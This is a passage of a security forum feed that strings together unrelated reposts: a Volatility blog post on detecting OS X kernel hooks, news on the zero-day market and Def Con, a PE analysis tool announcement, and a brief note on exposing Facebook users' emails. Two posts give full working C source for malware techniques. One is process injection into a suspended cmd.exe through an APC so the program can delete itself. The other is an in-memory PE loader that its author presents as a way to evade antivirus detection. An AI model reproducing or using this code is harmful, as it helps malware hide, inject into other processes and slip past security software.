the output (check_hooks/findKextWithAddress function). As pointed out in the Volatility Blog, this rootkit hooks three functions: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Rubilyn hook detection[/TD] [/TR] [/TABLE] Syscall Function Interception or Inlining Currently it is not possible to detect an inlined syscall function with the Mac side of the Volatility Framework because it only checks for the direct modification of the syscall table. To be able to detect function inlining, I applied two techniques: Check the function's prologue for modification, which will be useful later as well Check for the function's flow control Looking at the syscall function prologues, it can be seen that they contain the following: For x86: PUSH RBP MOV EBP, ESP For x64: PUSH RBP MOV RBP, RSP The volshell script I used to see this is below: #get sysent addresses for exit and setuidnsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace) sysents = obj.Object(theType = "Array", offset = self.addrspace.profile.get_symbol("_sysent"), vm = self.addrspace, count = nsysent, targetType = "sysent") for (i, sysent) in enumerate(sysents): tgt_addr = sysent.sy_call.v() print self.addrspace.profile.get_symbol_by_address("kernel", tgt_addr) buf = self.addrspace.read(tgt_addr, 4) for op in distorm3.Decompose(tgt_addr, buf, distorm3.Decode64Bits): print op The check_hooks/isPrologInlined function checks to see if the prologue conforms with these known instructions. The check_hooks/isInlined function, on the other hand, looks for calls, jumps or push/ret instructions that end up outside the kernel address space. If we use the check_hooks plugin on a memory sample with the inlined setuid syscall function that trampolines into the exit syscall function we get the following: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Inlinded Function (setuid) Detection[/TD] [/TR] [/TABLE] This example is interesting because it wouldn't be picked up by the isInlined function since the hook is within the kernel address space, but luckily I'm checking for function prologue modification, which flagged it. Another example of syscall inline hooking is DTrace fbt hooking, which modifies the hooked function's prologue. The check_hooks plugin will detect the DTrace fbt probe that is monitoring the getdirentries64 syscall function as well: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]DTrace fbt probe detection[/TD] [/TR] [/TABLE] Patched Syscall Handler or Shadow Syscall Table The shadowing of the syscall table is a technique that hides the attacker's modifications to the syscall table by creating a copy of it to modify and by keeping the original untouched as discussed in my previous post. The detection implemented in the check_hooks/isSyscallShadowed function works as follows: Check functions known to have references to the syscall table. In this case the functions are unix_syscall_return, unix_syscall64, unix_syscall. Disassemble them to find the syscall table references. Obtain the references in the function and compare to the address in the symbols table. After running the attack code sample for the shadow syscall table attack, I ran the check_hooks plugin against the memory sample and received the following output that included hits for the shadow syscall table: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Shadow syscall table detection[/TD] [/TR] [/TABLE] It looks like I have covered the detection of the examples in my previous post, but I'm not done! Bonus! Scanning Functions in Kernel/Kext Symbol Tables Now that I have the tools to detect function modifications, I decided to check on the functions in the rest of the kernel and kernel extensions. To be able to accomplish this task, I had to obtain the list of symbols per kernel or kext since the Volatility Framework is currently not able to list kernel or kext symbols from a memory sample. I followed these steps in the check_hooks/getKextSymbols function: Get the Mach-o header (e.g. mach_header_64) to get the start of segments. Locate the __LINKEDIT segment to get the address for the list of symbols represented as nlist_64 structs, symbols file size and offsets. Locate the the segment with the LC_SYMTAB command to get the symbols and strings offsets, which will be used to... Calculate the location of the symbols in __LINKEDIT. Once we know the exact address, loop through the nlist structs to get the symbols. Also find the number of the __TEXT segment's __text section number, which will be used to filter out symbols. According to Apple's documentation the compiler places only executable code in this section. The nlist structs have a member called n_sect, which stores the section number that the symbol's code lives in. This value, in conjunction with the __text section's number helped in narrowing down the list of symbols to mostly functions' symbols. I say mostly because I have seen structures, such as _mh_execute_header still listed. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Some test output for kernel symbols[/TD] [/TR] [/TABLE] Next step is to use the addresses obtained form the filtered symbols table to check for hooks. Quick note, while syscall functions had identical function prologues, other functions in the symbols table, such as bcopy, have different ones. Therefore, using the isPrologInlined function produces false positives, which left me with using the isInlined function to detect hooks. My target for this case is an OS X 10.8.3 VM running Hydra, a kernel extension that intercepts a process's creation, suspends it, and communicates it to a userland daemon, which was written by @osxreverser. Hydra inline hooks the function proc_resetregister in order to achieve its first goal. After compiling and loading the kext, I ran the check_hooks plugin with the -K option to only scan the kernel to see what's detected: As seen in the screenshot, the plugin detects the function proc_resetregister as inline hooked and shows that the destination of the hook is in the 'put.as.hydra' kext. The other plugin specific option -X will scan all kexts' symbols, if available, for hooking. Note: Most testing was performed on OS X 10.7.5 x64 and 10.8.3 x64. Feedback about outcomes on other OS X versions would be appreciated. Conclusion With the check_hooks plugin, now it's possible to detect hooked functions in the syscall table and kext symbols besides a shadow syscall table. While this is great, it doesn't end here. In my next post I'll be exploring OS X IDT hooks so stay tuned! Posted by siliconblade at 10:20 PM Sursa: What's in your silicon?: Back to Defense: Finding Hooks in OS X with Volatility
-
[h=1]Governments are Big Buyers of Zero-Day Flaws[/h] 15 July 2013 [h=2]The extent and sophistication of the market for zero-day vulnerabilities is becoming better understood. It appears that governments – especially the US, UK, Israel, Russia, India and Brazil – are among the biggest customers.[/h] A new report in the New York Times describes the market for zero-day flaws. "On the tiny Mediterranean island of Malta, two Italian hackers have been searching for bugs... secret flaws in computer code that governments pay hundreds of thousands of dollars to learn about and exploit." The hackers in question run the company known as Revuln, and like France-based Vupen, it finds or acquires zero-day vulnerabilities that it can sell on to the highest bidder. Vupen charges its customers an annual subscription fee of $100,000 merely to see its catalog of flaws – and then charges extra for each vulnerability. At these prices, it is unsurprising that the buyer is usually a government agency. As Graham Cluley comments, "The truth is that the likes of Google and Microsoft are never likely to be able to pay as much for a security vulnerability as the US or Chinese intelligence agencies." Although Microsoft has recently introduced a maximum bug bounty of $150,000, it pales into insignificance in the face of the reputed $500,000 paid for an iOS bug. Revuln's work has long been known. The Q4 2012 ICS-CERT Monitor warned, "Malta-based security start-up firm ReVuln claims to be sitting on a stockpile of vulnerabilities in industrial control software, but prefers to sell the information to governments and other paying customers instead of disclosing it to the affected software vendors." ICS vulnerabilities are precisely those needed by states to protect their own or attack foreign critical infrastructures. Last week, Der Spiegel published details of an email interview between Jacob Appelbaum and Edward Snowden. Snowden confirmed that Stuxnet had been jointly developed by the US and Israel. There is no information on whether the zero-days in Stuxnet were discovered or bought, but nevertheless ACLU policy analyst Christopher Soghoian blames Stuxnet for the success of companies like Vupen and Revuln. The knowledge that military organizations are interested in and use zero-day flaws "showed the world what was possible," explains the Times. "It also became a catalyst for a cyberarms race." The military establishment, said Soghoian, “created Frankenstein by feeding the market.” The problem now is that no-one knows how big or scary this Frankenstein might become. Is there a danger, for example, that developers could be persuaded to build in backdoors that they can later sell? Jeremiah Grossman, Founder and CTO of WhiteHat Security thinks this is a possibility. "As 0-days go for six to seven figures, imagine the temptation for rogue developers to surreptitiously implant bugs in the software supply chain," he commented. "It's hard enough to find vulnerabilities in source code when developers are not purposely trying to hide them." This is a problem that is not going away. "Vulnerability is a function of complexity, and as operating systems and source code continually trend to more complexity, so does the scope for vulnerabilities and exploits," said Adrian Culley, a consultant with Damballa (and a former Scotland Yard detective) to Infosecurity. "All code is dual use. The reality is there is now a free market; and to coin a trite cliche, the lid is off off Pandora's box." Sursa: Infosecurity - Governments are Big Buyers of Zero-Day Flaws
-
[h=1]Self-deleting executable[/h]by [h=3]zwclose7[/h]This is another example of PE injection. This program will create a suspended cmd.exe process, and then inject the executable image into to the child process. An user mode APC is then queued to the child process's primary thread. Finally, the thread is resumed and the injected code is executed. The injected code calls DeleteFile function to delete the original executable file. 1) Get the PE header of the program using RtlImageNtHeader. 2) Create a suspended cmd.exe using CreateProcess function. 3) Allocate executable memory in the child process. 4) Relocate the executable image, and then write it to the child process using NtWriteVirtualMemory function. 5) Queue an user mode APC to the child process's primary thread. 6) Resume the primary thread using NtResumeThread function. 7) The primary thread executes the injected code. 8) The injected code calls DeleteFile function to delete the original executable file. 9) The injected code calls ExitProcess function to terminate the cmd.exe process. #include <Windows.h>#include <winternl.h> #pragma comment(lib,"ntdll.lib") EXTERN_C PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID); EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG); EXTERN_C NTSTATUS NTAPI NtResumeThread(HANDLE,PULONG); EXTERN_C NTSTATUS NTAPI NtTerminateProcess(HANDLE,NTSTATUS); char szFileName[260]; void WINAPI ThreadProc() { while(1) { Sleep(1000); if(DeleteFile(szFileName)) { break; } } ExitProcess(0); } int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow) { PIMAGE_NT_HEADERS pINH; PIMAGE_DATA_DIRECTORY pIDD; PIMAGE_BASE_RELOCATION pIBR; HMODULE hModule; PVOID image,mem,StartAddress; DWORD i,count,nSizeOfImage; DWORD_PTR delta,OldDelta; LPWORD list; PDWORD_PTR p; STARTUPINFO si; PROCESS_INFORMATION pi; GetModuleFileName(NULL,szFileName,260); hModule=GetModuleHandle(NULL); pINH=RtlImageNtHeader(hModule); nSizeOfImage=pINH->OptionalHeader.SizeOfImage; memset(&si,0,sizeof(si)); memset(?,0,sizeof(pi)); if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,FALSE,CREATE_SUSPENDED|CREATE_NO_WINDOW,NULL,NULL,&si,?)) { return 1; } mem=VirtualAllocEx(pi.hProcess,NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(mem==NULL) { NtTerminateProcess(pi.hProcess,0); return 1; } image=VirtualAlloc(NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); memcpy(image,hModule,nSizeOfImage); pIDD=&pINH->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_BASERELOC]; pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)image+pIDD->VirtualAddress); delta=(DWORD_PTR)((LPBYTE)mem-pINH->OptionalHeader.ImageBase); OldDelta=(DWORD_PTR)((LPBYTE)hModule-pINH->OptionalHeader.ImageBase); while(pIBR->VirtualAddress!=0) { if(pIBR->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION)) { count=(pIBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD); list=(LPWORD)((LPBYTE)pIBR+sizeof(IMAGE_BASE_RELOCATION)); for(i=0;i<count;i++) { if(list>0) { p=(PDWORD_PTR)((LPBYTE)image+(pIBR->VirtualAddress+(0x0fff & (list)))); *p-=OldDelta; *p+=delta; } } } pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR+pIBR->SizeOfBlock); } if(!NT_SUCCESS(NtWriteVirtualMemory(pi.hProcess,mem,image,nSizeOfImage,NULL))) { NtTerminateProcess(pi.hProcess,0); return 1; } StartAddress=(PVOID)((LPBYTE)mem+(DWORD_PTR)(LPBYTE)ThreadProc-(LPBYTE)hModule); if(!QueueUserAPC((PAPCFUNC)StartAddress,pi.hThread,0)) { NtTerminateProcess(pi.hProcess,0); return 1; } NtResumeThread(pi.hThread,NULL); NtClose(pi.hThread); NtClose(pi.hProcess); VirtualFree(image,0,MEM_RELEASE); return 0; } [h=4]Attached Files[/h] selfdel.zip 272.35K 6 downloads Sursa: Self-deleting executable - rohitab.com - Forums
-
- 1
-
-
[h=1]Execute PE file on virtual memory[/h]by [h=3]shebaw[/h]Hi everyone. I've been reversing some malware like ramnit and I noticed that they contain most of their codes in embedded executable programs and proceed to execute the program as if it's part of the parent program. This is different from process forking method since that creates a new process while this one just calls into the embedded program as if it's one of it's own function (well almost ). So here is a code I came up with that does just that. What it basically does is, it first maps the executable's different sections on to an executable memory region, it then imports and builds the IAT of the executable and finally performs relocation fix-ups and transfers control to the entry point of the executable after setting up ebx to point to PEB and eax to the EP. Since you can't always allocate on the preferred base address of the executable, relocation table is a MUST. This won't work on executables without relocation tables but that shouldn't matter if you are trying to obfuscate your own code since you can tell the compiler to include relocation tables when you recompile it. You can use this method as another layer of protection from AVs. #include <Windows.h>#include <string.h> #include <stdio.h> #include <tchar.h> #include "mem_map.h" HMODULE load_dll(const char *dll_name) { HMODULE module; module = GetModuleHandle(dll_name); if (!module) module = LoadLibrary(dll_name); return module; } void *get_proc_address(HMODULE module, const char *proc_name) { char *modb = (char *)module; IMAGE_DOS_HEADER *dos_header = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nt_headers = (IMAGE_NT_HEADERS *)(modb + dos_header->e_lfanew); IMAGE_OPTIONAL_HEADER *opt_header = &nt_headers->OptionalHeader; IMAGE_DATA_DIRECTORY *exp_entry = (IMAGE_DATA_DIRECTORY *) (&opt_header->DataDirectory[iMAGE_DIRECTORY_ENTRY_EXPORT]); IMAGE_EXPORT_DIRECTORY *exp_dir = (IMAGE_EXPORT_DIRECTORY *)(modb + exp_entry->VirtualAddress); void **func_table = (void **)(modb + exp_dir->AddressOfFunctions); WORD *ord_table = (WORD *)(modb + exp_dir->AddressOfNameOrdinals); char **name_table = (char **)(modb + exp_dir->AddressOfNames); void *address = NULL; DWORD i; /* is ordinal? */ if (((DWORD)proc_name >> 16) == 0) { WORD ordinal = LOWORD(proc_name); DWORD ord_base = exp_dir->Base; /* is valid ordinal? */ if (ordinal < ord_base || ordinal > ord_base + exp_dir->NumberOfFunctions) return NULL; /* taking ordinal base into consideration */ address = (void *)(modb + (DWORD)func_table[ordinal - ord_base]); } else { /* import by name */ for (i = 0; i < exp_dir->NumberOfNames; i++) { /* name table pointers are rvas */ if (strcmp(proc_name, modb + (DWORD)name_table) == 0) address = (void *)(modb + (DWORD)func_table[ord_table]); } } /* is forwarded? */ if ((char *)address >= (char *)exp_dir && (char *)address < (char *)exp_dir + exp_entry->Size) { char *dll_name, *func_name; HMODULE frwd_module; dll_name = strdup((char *)address); if (!dll_name) return NULL; address = NULL; func_name = strchr(dll_name, '.'); *func_name++ = 0; if (frwd_module = load_dll(dll_name)) address = get_proc_address(frwd_module, func_name); free(dll_name); } return address; } #define MAKE_ORDINAL(val) (val & 0xffff) int load_imports(IMAGE_IMPORT_DESCRIPTOR *imp_desc, void *load_address) { while (imp_desc->Name || imp_desc->TimeDateStamp) { IMAGE_THUNK_DATA *name_table, *address_table, *thunk; char *dll_name = (char *)load_address + imp_desc->Name; HMODULE module; module = load_dll(dll_name); if (!module) { printf("error loading %s\n", dll_name); return 0; } name_table = (IMAGE_THUNK_DATA *)((char *)load_address + imp_desc->OriginalFirstThunk); address_table = (IMAGE_THUNK_DATA *)((char *)load_address + imp_desc->FirstThunk); /* if there is no name table, use address table */ thunk = name_table == load_address ? address_table : name_table; if (thunk == load_address) return 0; while (thunk->u1.AddressOfData) { unsigned char *func_name; /* is ordinal? */ if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) func_name = (unsigned char *)MAKE_ORDINAL(thunk->u1.Ordinal); else func_name = ((IMAGE_IMPORT_BY_NAME *)((char *)load_address + thunk->u1.AddressOfData))->Name; /* address_table->u1.Function = (DWORD)GetProcAddress(module, (char *)func_name); */ address_table->u1.Function = (DWORD)get_proc_address(module, (char *)func_name); thunk++; address_table++; } imp_desc++; } return 1; } void fix_relocations(IMAGE_BASE_RELOCATION *base_reloc, DWORD dir_size, DWORD new_imgbase, DWORD old_imgbase) { IMAGE_BASE_RELOCATION *cur_reloc = base_reloc, *reloc_end; DWORD delta = new_imgbase - old_imgbase; reloc_end = (IMAGE_BASE_RELOCATION *)((char *)base_reloc + dir_size); while (cur_reloc < reloc_end && cur_reloc->VirtualAddress) { int count = (cur_reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); WORD *cur_entry = (WORD *)(cur_reloc + 1); void *page_va = (void *)((char *)new_imgbase + cur_reloc->VirtualAddress); while (count--) { /* is valid x86 relocation? */ if (*cur_entry >> 12 == IMAGE_REL_BASED_HIGHLOW) *(DWORD *)((char *)page_va + (*cur_entry & 0x0fff)) += delta; cur_entry++; } /* advance to the next one */ cur_reloc = (IMAGE_BASE_RELOCATION *)((char *)cur_reloc + cur_reloc->SizeOfBlock); } } IMAGE_NT_HEADERS *get_nthdrs(void *map) { IMAGE_DOS_HEADER *dos_hdr; dos_hdr = (IMAGE_DOS_HEADER *)map; return (IMAGE_NT_HEADERS *)((char *)map + dos_hdr->e_lfanew); } /* returns EP mem address on success * NULL on failure */ void *load_pe(void *fmap) { IMAGE_NT_HEADERS *nthdrs; IMAGE_DATA_DIRECTORY *reloc_entry, *imp_entry; void *vmap; WORD nsections, i; IMAGE_SECTION_HEADER *sec_hdr; size_t hdrs_size; IMAGE_BASE_RELOCATION *base_reloc; nthdrs = get_nthdrs(fmap); reloc_entry = &nthdrs->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_BASERELOC]; /* no reloc info? */ if (!reloc_entry->VirtualAddress) return NULL; /* allocate executable mem (.SizeOfImage) */ vmap = VirtualAlloc(NULL, nthdrs->OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (!vmap) return NULL; /* copy the Image + Sec hdrs */ nsections = nthdrs->FileHeader.NumberOfSections; sec_hdr = IMAGE_FIRST_SECTION(nthdrs); hdrs_size = (char *)(sec_hdr + nsections) - (char *)fmap; memcpy(vmap, fmap, hdrs_size); /* copy the sections */ for (i = 0; i < nsections; i++) { size_t sec_size; sec_size = sec_hdr.SizeOfRawData; memcpy((char *)vmap + sec_hdr.VirtualAddress, (char *)fmap + sec_hdr.PointerToRawData, sec_size); } /* load dlls */ imp_entry = &nthdrs->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_IMPORT]; if (!load_imports((IMAGE_IMPORT_DESCRIPTOR *) ((char *)vmap + imp_entry->VirtualAddress), vmap)) goto cleanup; /* fix relocations */ base_reloc = (IMAGE_BASE_RELOCATION *)((char *)vmap + reloc_entry->VirtualAddress); fix_relocations(base_reloc, reloc_entry->Size, (DWORD)vmap, nthdrs->OptionalHeader.ImageBase); return (void *)((char *)vmap + nthdrs->OptionalHeader.AddressOfEntryPoint); cleanup: VirtualFree(vmap, 0, MEM_RELEASE); return NULL; } int vmem_exec(void *fmap) { void *ep; ep = load_pe(fmap); if (!ep) return 0; __asm { mov ebx, fs:[0x30] mov eax, ep call eax } return 1; } Sursa: Execute PE file on virtual memory - rohitab.com - Forums
-
[h=2]PE-bear[/h] [h=2]What it is?[/h] PE-bear is my new project. It’s a reversing tool for PE files. [h=2]Download[/h] The latest version is 0.1.5 (beta), released: 14.07.2013 changelog.txt changelog.pdf Avaliable here: PE-bear 0.1.5 32bit PE-bear 0.1.5 64bit *requires: Microsoft Visual C++ 2010 Redistributable Package, avaliable here: Redist 32bit Redist 64bit [h=2]Features and details[/h] handles PE32 and PE64 views multiple files in parallel recognizes known packers (by signatures) fast disassembler – starting from any chosen RVA/File offset visualization of sections layout selective comparing of two chosen PE files integration with explorer menu and more… Currently project is under rapid development. You can expect new fetaures/fixes every week. Any sugestions/bug reports are welcome. I am waiting for your e-mails and comments. [h=2]Screenshots[/h] Sursa: PE-bear | hasherezade's 1001 nights
-
59b63a G 5af3107aba69 G 0 G 46 He explained that, in above string, “G“ acting as a delimiter/separator, where 2nd value after first “G“ i.e 5af3107aba69 is the Profile ID of user. Replacing user ID can give expose email ID of any user in Sign Up Page. Attacker can obtain this numerical ID of facebook profile from Graph API. Superb
-
cybersmartdefence.com DOWN justiceofddos.com DOWN
Nytro replied to codemaniac's topic in Cosul de gunoi
Asta nu e ShowOff. -
https://rstforums.com/forum/70576-facultati-de-informatica.rst
-
M-am chinuit degeaba sa scriu: https://rstforums.com/forum/70576-facultati-de-informatica.rst
-
Ultra gay.
-
[h=1]Feds asked to avoid Def Con hacking conference after PRISM scandal[/h]by Dan Worth The organisers of the US hacking conference Def Con have asked federal agents to stay away from this year's event given the revelations about the PRISM hacking scandal that broke earlier this year, generating huge levels of mistrust among the hacking community. Writing under his alias The Dark Tangent on the event’s website, organiser Jeff Moss said in the past the open nature of Def Con had been its greatest asset and a reason why the event had proved so popular. “For over two decades Def Con has been an open nexus of hacker culture, a place where seasoned pros, hackers, academics, and feds can meet, share ideas and party on neutral territory,” he wrote. “Our community operates in the spirit of openness, verified trust, and mutual respect.” However, he said that this year it would be sensible if a line was drawn and agents did not attend, as emotions would be running high about the extent of surveillance carried out by the government under the PRISM data collection scheme. “When it comes to sharing and socialising with feds, recent revelations have made many in the community uncomfortable about this relationship,” Moss added. “Therefore, I think it would be best for everyone involved if the feds call a ‘time-out’ and not attend DEF CON this year.” He added that this would give everybody “time to think about how we got here, and what comes next." Earlier this week the European Commission (EC) approved an investigation into the PRISM spying scandal, which also led to claims that government offices had been bugged in order to pry into conversations between world leaders. Sursa: Feds asked to avoid Def Con hacking conference after PRISM scandal - IT News from V3.co.uk